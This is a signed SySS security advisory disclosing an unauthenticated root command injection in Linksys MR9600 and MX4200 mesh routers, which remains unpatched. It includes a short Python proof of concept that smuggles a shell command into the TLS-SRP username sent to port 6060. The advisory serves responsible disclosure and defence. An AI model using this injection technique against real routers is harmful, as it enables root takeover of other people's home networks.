-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-010 Product: MR9600, MX4200 (and potentially others) Manufacturer: Linksys Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others) Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: Open Manufacturer Notification: 2025-03-18 Solution Date: - Public Disclosure: 2026-02-12 CVE Reference: CVE-2026-27848 Author of Advisory: Christian Zäske, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Linksys MX4200 is a Wi-Fi mesh router targeting home users. The manufacturer describes the product as follows (see [1]): "This router supports the latest Wi-Fi® 6 (802.11ax) standard for next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers faster WiFi performance for lag-free online gaming and simultaneous streaming to every device and corner of your home." Due to missing neutralization of special elements, OS commands can be injected via the handshake of a TLS-SRP connection, which are ultimately run as the root user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Linksys MR9600 (and other models) provides a service (sct_server binary) running on TCP port 6060 (all interfaces except WAN), which is used to integrate other mesh devices into the network. The service accepts TLS-SRP connections with a username and password. The service uses a different script (smcdb_auth) to receive credential information using the given username. Since the service does not neutralize special elements and appends the username as a command line argument, arbitrary OS commands can be injected via the username of the TLS-SRP handshake. These commands are run as the root user without the need of a valid username or password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the "tlslite-ng" library, the following Python code will result in the LED indicator at the top turning yellow, indicating that the OS command was successfully executed. No valid username or password is needed. from socket import * from tlslite.api import * sock = socket.socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.1.1", 6060)) conn = TLSConnection(sock) conn.handshakeClientSRP("; . /etc/led/lib_nodes_hw.sh; combo_solid yellow on;", "dummypass") ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no known solution yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-11-11: Vulnerability discovered 2025-03-18: Vulnerability reported to manufacturer 2025-04-07: First response from manufacturer 2025-04-14: Requested an update from manufacturer 2025-05-06: Acknowledgment of vulnerabilities by the manufacturer 2026-02-12: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Linksys MX4200 https://support.linksys.com/kb/article/952-en/ [2] SySS Security Advisory SYSS-2025-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Zäske of SySS GmbH. E-Mail: christian.zaeske@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc Key ID: 0x7B00D164A32F9AC9 Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEUdRumzwpc0esAQ9aewDRZKMvmskFAmmezDUACgkQewDRZKMv msk75g//dpEv4dk3br9d96hSZBBhiuwcoXiHwGfEv/dhUNqrDO42xLbLLqmukV1f 7T80a9QjVz6qGyADm8v9L9f8pOFldsHIGrsePjC6xbIpYVweJseCItYgIS9Rqvao ORtsydLFFDfsspeURjpw5qlpQzA0aeN04CgJkhl1GGs3F2ht9c37RORLtaIkYyyc IDExuhDOx5XRh+4f8U/3OLoXwN76jOV2cpbyuNYRUrMgJQ6VBeu6sZmeeJvI1O7M BYBJhGyoL4R4PmYltYxXpZHpy9579kjfvh02FuYD+zCXryNnCbvw7GvZf0rBWIlx gZn7cFLQcyyWQpciAPxaVwfiBzbpE1B7P8B3b/6twVAZzXmr9VKmMbxxVKERhryH y6qcRvD0k3omB8MEx5PxTTEBZh4RO9LR4ay97+Q17DAIY8LZ3wb6Uiry5rW23Q5R oWuX/76wEiwNgBAyEAMsjj5au+3unaxeuYOc82wdzd9XASbqaEx8IUMgw9rP4OCd biGpHywVi35OfyPIGyRvt5aVQxsGkpHt3EAC2nqsg6BOrnJy4nLnBXkgupNVzJ2v RLRQQFgpcD+eC0C1pAVAYiBj0J1vwMmw1tc0vGnvDoX9D0W6WNS++1g6w068Emum KfDcwQg7WrylMhFrSjX7eHkbBszUJncbJXkRMbXg96nGIUYp2kY= =6YyR -----END PGP SIGNATURE-----